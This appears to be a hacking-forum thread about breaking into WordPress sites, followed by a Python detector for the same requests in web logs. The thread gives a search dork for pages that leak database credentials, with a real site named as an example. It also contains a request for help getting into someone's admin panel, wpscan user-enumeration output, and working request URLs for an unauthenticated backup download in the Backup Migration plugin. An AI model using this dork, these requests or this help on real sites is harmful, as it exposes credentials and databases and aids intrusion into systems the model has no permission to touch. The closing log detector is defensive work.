With many hosting companies moving to PHP 7 and other versions that lack certain functions, interesting error messages have started to appear that include sensitive information. The following example demonstrates disclosure of database connection credentials.

Example: depts.washington.edu/leaders1/elizabeth-smith/feed/

Dork: intext:Stack trace #0 wpdb->__construct(
WordPress <= 4.8.2 SQL Injection PoC: http://blog.vulspy.com/2017/11/09/Wordpress-4-8-2-SQL-Injection-POC/
Double prepare: https://medium.com/websec/wordpress-sqli-bbb2afcc8e94
I found a way to upload a shell into WordPress when you have a MySQL connection and the admin panel (provided that all directories are closed for writing or there is an .htaccess), or am I reinventing the wheel?
Could you tell me whether it is possible to get access to the admin panel? One login was found. You can PM me.

wpscan output:

[+] Headers
 | Interesting Entries:
 |  - Server: Apache
 |  - X-Redirect-By: WordPress
 |  - Upgrade: h2,h2c
 |  - X-Endurance-Cache-Level: 2
 |  - X-nginx-cache: WordPress
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] robots.txt found: http://example.com/robots.txt
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://example.com/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://example.com/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] This site has 'Must Use Plugins': http://example.com/wp-content/mu-plugins/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 80%
 | Reference: http://codex.wordpress.org/Must_Use_Plugins

[+] The external WP-Cron seems to be enabled: http://example.com/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 6.0.2 identified (Latest, released on 2022-08-30).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://www.example.com/60274a2.html, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=6.0.2'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://www.example.com/60274a2.html, Match: 'WordPress 6.0.2'

The main theme could not be detected.

[+] Enumerating Vulnerable Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

No plugins Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:18 <==========================================================> (10 / 10) 100.00% Time: 00:00:18

User(s) Identified:

[+] admin
 | Found By: Wp Json Api (Aggressive Detection)
 |  - http://example.com/wp-json/wp/v2/users/?per_page=100&page=1
 | Confirmed By: Oembed API - Author URL (Aggressive Detection)
 |  - http://example.com/wp-json/oembed/1.0/embed?url=http://example.com/&format=json

[+] WPScan DB API OK
 | Plan: free
 | Requests Done (during the scan): 3
 | Requests Remaining: 72

[+] Finished: Fri Sep 16 09:54:27 2022
[+] Requests Done: 64
[+] Cached Requests: 7
[+] Data Sent: 17.824 KB
[+] Data Received: 885.887 KB
[+] Memory used: 195.398 MB
[+] Elapsed time: 00:00:48
The "Backup Migration" plugin allows an unauthenticated user to download a database backup that the admin created but did not delete. From here we pull out the name of the zip file.

https://wordpress-5-0-19.localhost/?backup-migration=BMI_BACKUP&backup-id=md5summary.php

Download the backup.

https://wordpress-5-0-19.localhost/...ckup_2023-08-04_05_29_36_Tu54wvHxQhRqFf0A.zip

Tested on 1.2.9
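From the defender's side, both the wpscan author enumeration above (the `/wp-json/wp/v2/users/` and oEmbed requests) and the Backup Migration `?backup-migration=BMI_BACKUP&backup-id=` fetches leave a clear trace in the web server access log. The following is an added example, not code from the thread or from the plugin: a small detector that parses Apache/nginx combined-format log lines and groups the hits per source IP. The sample log lines are constructed, the backup file name in them is a placeholder, and the user-agent strings are assumed.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Apache/nginx "combined" access-log format: ip, timestamp, request line, status, size, referer, UA.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "[^"]*" "(?P<ua>[^"]*)"$'
)

# Constructed sample lines (not taken from the thread); the backup file name is a placeholder.
SAMPLE_LOG = """\
203.0.113.5 - - [16/Sep/2022:09:53:41 +0000] "GET /wp-json/wp/v2/users/?per_page=100&page=1 HTTP/1.1" 200 812 "-" "WPScan v3.8.22"
203.0.113.5 - - [16/Sep/2022:09:53:42 +0000] "GET /wp-json/oembed/1.0/embed?url=http://example.com/&format=json HTTP/1.1" 200 310 "-" "WPScan v3.8.22"
198.51.100.7 - - [04/Aug/2023:05:31:02 +0000] "GET /?backup-migration=BMI_BACKUP&backup-id=md5summary.php HTTP/1.1" 200 96 "-" "curl/8.1.2"
198.51.100.7 - - [04/Aug/2023:05:31:09 +0000] "GET /?backup-migration=BMI_BACKUP&backup-id=backup_PLACEHOLDER.zip HTTP/1.1" 200 52428800 "-" "curl/8.1.2"
192.0.2.9 - - [04/Aug/2023:06:00:00 +0000] "GET /index.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

def classify(line):
    """Return (ip, status, [findings]) for one log line, or None if nothing is suspicious."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    query = parse_qs(url.query)
    findings = []
    # Backup retrieval through the plugin's query-string endpoint (no session needed).
    if query.get("backup-migration") == ["BMI_BACKUP"]:
        findings.append("backup-migration fetch: " + query.get("backup-id", ["?"])[0])
    # Author enumeration through the REST users list and the oEmbed author URL.
    if url.path.startswith("/wp-json/wp/v2/users"):
        findings.append("user enumeration via REST users endpoint")
    if url.path.startswith("/wp-json/oembed/1.0/embed"):
        findings.append("user enumeration via oEmbed author URL")
    if "wpscan" in m["ua"].lower():
        findings.append("WPScan user-agent")
    return (m["ip"], int(m["status"]), findings) if findings else None

def scan(log_text):
    """Group findings per source IP, keeping only requests the server actually served (2xx)."""
    report = {}
    for line in log_text.splitlines():
        hit = classify(line)
        if hit and 200 <= hit[1] < 300:
            report.setdefault(hit[0], []).extend(hit[2])
    return report

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

A 2xx on a `backup-migration` fetch with a large response size is the signal that a backup actually left the server; the same check against the admin's own IP range is how to tell a legitimate download from a stranger's.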